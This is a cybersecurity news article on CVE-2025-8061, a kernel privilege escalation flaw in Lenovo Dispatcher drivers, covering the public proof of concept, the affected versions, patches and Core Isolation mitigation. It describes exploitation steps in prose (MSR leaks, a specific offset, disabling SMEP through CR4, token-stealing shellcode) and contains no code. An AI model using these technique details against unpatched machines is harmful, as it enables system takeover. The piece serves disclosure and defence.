A critical vulnerability in Lenovo’s Dispatcher drivers has come under the spotlight after researchers released a proof-of-concept exploit that demonstrates privilege escalation on affected Windows systems.
Identified as CVE-2025-8061, this flaw stems from insufficient access controls in the drivers, potentially allowing local attackers to execute arbitrary code with elevated privileges.
Discovered by security firm Quarkslab, the issue affects Lenovo consumer notebooks running older driver versions, raising alarms for users who haven’t applied recent patches.
Vulnerability Breakdown
The Lenovo Dispatcher drivers, versions 3.0 and 3.1, handle system processes on certain consumer notebooks, but they expose an IOCTL interface without proper access restrictions.
This oversight, classified under CWE-782, enables an authenticated local user to manipulate the driver and trigger code execution in kernel mode, leading to full system compromise.
The National Vulnerability Database rates it with a CVSS 4.0 score of 7.3, citing high impacts on confidentiality, integrity, and availability, though it requires local access and high attack complexity.
Affected systems include those with LnvMSRIO.sys driver up to version 3.1.0.36, commonly found in Lenovo laptops preloaded with Windows 10 or older Windows 11 builds without default mitigations.
Newer Lenovo Dispatcher 3.2 and above are unaffected, as Lenovo patched the flaw in version 3.1.0.41 released in September 2025.
Importantly, enabling Windows Core Isolation Memory Integrity blocks exploitation, a feature active by default on Windows 11 Lenovo systems, reducing real-world risk for updated users.
| Aspect | Details |
|---|---|
| Affected Products | Lenovo Dispatcher Driver 3.0, 3.1 (LnvMSRIO.sys up to 3.1.0.36) on consumer notebooks |
| Impact Assessment | Local privilege escalation to kernel mode, potential full system control |
| Exploit Prerequisites | Authenticated local user access; Core Isolation disabled; specific Windows build (e.g., 24H2 without HVCI) |
| CVSS 3.1 Score | N/A (CVSS 4.0: 7.3 – High) |
Exploitation In Action
Security researcher Luis Casvella from Quarkslab detailed the exploit in a September 2025 blog post, highlighting how attackers can leverage the driver’s MSR read primitive to leak kernel addresses like KiSystemCall64 via the LSTAR register (MSR 0xC0000082).
This information enables bypassing ASLR and SMEP protections, with the PoC demonstrating shellcode for token stealing to impersonate the SYSTEM process.
A follow-up GitHub repository by symeonp provides a working PoC that spawns a SYSTEM shell on Windows 11 24H2, hardcoded for build 26100.1, requiring adjustments for offsets like KiSystemCall64 at 0x6b2b40 and CR4 manipulation to disable SMEP (bit 20).
The technique involves reading MSRs to locate syscalls, injecting shellcode that navigates kernel structures such as _KPCR and _EPROCESS for token manipulation, and restoring registers like CR4 and LSTAR to avoid crashes.
Casvella’s analysis notes four related bugs in the driver, emphasizing BYOVD tactics where signed drivers evade DSE for post-exploitation.
While no wild exploits are reported, the public PoC underscores the ease of adaptation for red teamers or malware authors targeting unpatched Lenovo devices.
Lenovo urges immediate updates to Dispatcher Driver 3.1.0.41 or later via Windows Update or their support site to close the gap.
For added protection, users should verify Core Isolation in Windows Security under Device Security, toggling Memory Integrity on if it is disabled, which blocks kernel exploits without performance hits on modern hardware.
Organizations should scan for vulnerable drivers using tools like those from AhnLab or monitor for IOCTL anomalies on endpoints.
The disclosure timeline reveals Quarkslab’s coordinated efforts with Lenovo since June 2025, culminating in patches despite delays.
As BYOVD remains a staple in advanced threats, this incident highlights the need for vigilant driver management in enterprise environments. With the PoC now public, prompt action is essential to safeguard against privilege escalation chains in real attacks.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
